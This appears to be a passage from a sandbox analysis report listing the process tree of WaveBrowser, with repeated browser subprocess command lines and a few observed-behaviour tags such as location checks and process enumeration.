C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9172,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9520 /prefetch:85⤵PID:6580
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9232,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9544 /prefetch:85⤵PID:6000
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9512,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9180 /prefetch:85⤵PID:5272
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9952,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9964 /prefetch:85⤵PID:6948
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4624,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10108 /prefetch:85⤵PID:6320
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9828,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10252 /prefetch:85⤵PID:6444
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9956,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7704 /prefetch:85⤵PID:5736
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7760,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6072 /prefetch:85⤵PID:6912
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7708,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10432 /prefetch:85⤵PID:6736
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7668,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10728 /prefetch:85⤵PID:6212
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10876,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10924 /prefetch:85⤵PID:7824
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10868,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11064 /prefetch:85⤵PID:7836
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10736,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11208 /prefetch:85⤵PID:7848
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11344,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11240 /prefetch:85⤵PID:7892
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7776,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11492 /prefetch:85⤵PID:7924
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10888,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11636 /prefetch:85⤵PID:8056
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7664,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11684 /prefetch:85⤵PID:8116
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10896,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11820 /prefetch:85⤵PID:8132
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10904,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11964 /prefetch:85⤵PID:8148
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10912,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12108 /prefetch:85⤵PID:8164
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --field-trial-handle=11660,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12248 /prefetch:25⤵
- Checks computer location settings
PID:8176
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10884,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10900 /prefetch:85⤵PID:7004
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3816,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12632 /prefetch:85⤵PID:7484
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10908,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12664 /prefetch:85⤵PID:7452
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --field-trial-handle=12620,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12800 /prefetch:25⤵
- Checks computer location settings
PID:7432
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6244,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9356 /prefetch:85⤵PID:7936
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --field-trial-handle=4080,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=8740 /prefetch:25⤵
- Checks computer location settings
PID:8040
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --field-trial-handle=9924,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=9688 /prefetch:25⤵
- Checks computer location settings
PID:7592
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --field-trial-handle=7544,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4504 /prefetch:25⤵
- Checks computer location settings
PID:8080
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11224,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12792 /prefetch:85⤵PID:6336
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --field-trial-handle=12784,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11244 /prefetch:25⤵
- Checks computer location settings
PID:6252
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --field-trial-handle=7772,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12748 /prefetch:25⤵
- Checks computer location settings
PID:6768
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --field-trial-handle=12080,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12820 /prefetch:25⤵
- Checks computer location settings
PID:7268
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --field-trial-handle=12852,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12044 /prefetch:25⤵
- Checks computer location settings
PID:6900
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --field-trial-handle=12664,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11808 /prefetch:25⤵
- Checks computer location settings
PID:7376
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --field-trial-handle=11260,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11120 /prefetch:25⤵
- Checks computer location settings
PID:6468
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --field-trial-handle=9808,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10104 /prefetch:15⤵
- Checks computer location settings
PID:7724
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --field-trial-handle=12404,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10720 /prefetch:25⤵
- Checks computer location settings
PID:7172
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --field-trial-handle=5788,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11020 /prefetch:15⤵
- Checks computer location settings
PID:7776
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10976,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11024 /prefetch:85⤵PID:3648
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --field-trial-handle=10632,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7620 /prefetch:25⤵
- Checks computer location settings
PID:6676
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12372,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12444 /prefetch:85⤵PID:6984
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7000,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11656 /prefetch:85⤵PID:7108
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5996,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6008 /prefetch:85⤵PID:7064
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6688,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12112 /prefetch:85⤵PID:5764
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11688,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7712 /prefetch:85⤵PID:7412
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7288,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6884 /prefetch:85⤵PID:6936
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7260,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7336 /prefetch:85⤵PID:7296
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11652,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12172 /prefetch:85⤵PID:7332
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12124,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12132 /prefetch:85⤵PID:6720
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12136,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12700 /prefetch:85⤵PID:8184
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --field-trial-handle=10740,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=10452 /prefetch:25⤵
- Checks computer location settings
PID:6344
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10768,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6852 /prefetch:85⤵PID:7200
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --field-trial-handle=12944,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12100 /prefetch:25⤵
- Checks computer location settings
PID:2672
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12984,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=13036 /prefetch:85⤵PID:6720
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11096 /prefetch:85⤵PID:8176
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3300,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7404 /prefetch:85⤵PID:6856
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12540,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=756 /prefetch:85⤵PID:7044
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=12496,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7484 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:7820
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=10056,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=472 /prefetch:85⤵PID:5984
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=11516,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12448 /prefetch:85⤵PID:5328
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --field-trial-handle=560,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=1212 /prefetch:25⤵
- Checks computer location settings
PID:1540
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=456,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=7080 /prefetch:85⤵PID:1104
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=9684,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=11200 /prefetch:85⤵PID:1272
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=12488,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2428 /prefetch:85⤵PID:5336
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --field-trial-handle=6536,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=756 /prefetch:25⤵
- Checks computer location settings
PID:5996
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4680,i,8590214971664215756,13595371377568635989,262144 --variations-seed-version=15 --mojo-platform-channel-handle=12476 /prefetch:85⤵PID:7820
-
-
